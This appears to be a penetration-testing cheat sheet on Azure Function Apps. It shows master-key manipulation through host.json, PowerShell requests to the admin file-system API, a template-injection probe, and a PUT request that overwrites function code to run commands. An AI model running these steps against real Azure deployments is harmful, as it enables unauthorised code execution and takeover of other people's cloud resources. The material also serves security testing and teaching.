Function App
1.0 Master Key Abuse
You can gain access from Storage Accounts to Function App within the Master Key.
1.1 Pseudo-Decrypt Master Key
With write permission to host.json you can manipulate the master key. Change "encrypted": true to "encrypted": false and the encrypted value will be handled like plain text.
{
"masterKey": {
"name": "master",
"value": "f30gh034jgj5hjwmfpokg90ßi90klüogew4ütlgbh045kß095zhk95",
"encrypted": false
},$url = "https://$functionBase.azurewebsites.net/admin/vfs/site/wwwroot"
$Params = @{
"URI" = $url
"Method" = "GET"
"Headers" = @{
"Content-Type" = "application/octet-stream"
"x-functions-key" = "f30gh034jgj5hjwmfpokg90ßi90klüogew4ütlgbh045kß095zhk95"
}
}
Invoke-RestMethod @Params -UseBasicParsing2.0 Exploiting
2.1 Server Side Template Injection (SSTI)
If the website is rendered within a template engine, SSTI could be possible. You’ll need access to the trigger function.
# The output will be 16, if injection is possible
https://$functionBase.azurewebsites.net/api/Process?name=python&email={{2*8}}A collection of Injection techniques is available here.
2.2 File Upload
There are different ways to upload files:
- Weak upload scripts, without validations
- Write permissions in Storage Accounts
PUTRequest, to write files within the master key
$url = "https://$($functionBase).azurewebsites.net/admin/vfs/site/wwwroot/HttpTrigger/run.ps1"
$body = @"
`$data = `$Env:COMPUTERNAME
`$result = @"
Computername:
`$data
`"@
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
StatusCode = [HttpStatusCode]::OK
Body = `$result
})
"@
$Params = @{
"URI" = $url
"Headers" = @{
"Content-Type" = "application/octet-stream"
"x-functions-key" = "<MASTER_KEY>"
}
"Body" = $body
}
Invoke-RestMethod @Params -UseBasicParsing -Method PutThe above example writes a file which exfiltrates the computer name and displays it in the output.